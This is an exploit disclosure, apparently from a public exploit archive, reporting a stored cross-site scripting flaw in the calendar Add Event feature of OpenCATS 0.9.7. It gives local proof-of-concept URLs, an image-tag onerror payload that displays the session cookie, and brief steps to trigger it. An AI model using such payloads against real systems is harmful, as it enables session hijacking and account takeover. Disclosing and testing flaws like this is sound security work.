Opencats-0.9.7-Stored XSS in Calendar-Add-Event
Date: 2022/12/25
Exploit Author: Sakura501
Vendor Homepage: https://www.opencats.org/
Software Link: https://github.com/opencats/OpenCATS
Version: 0.9.7
Tested on: Windows11/PHP7.3.4/MySQL5.7.26
URL&POC
http://192.168.2.153/src/opencats/index.php?m=calendar
http://192.168.2.153/src/opencats/index.php?m=calendar&view=DAYVIEW&month=12&year=2022&day=25&showEvent=1
<img src=x onerror=alert(document.cookie);>
Attack Steps
-
Click the Calendat Menu.
-
Click the Add Event button, then the stored XSS will be triggered. You can also click the incoming event to trigger this stored XSS.



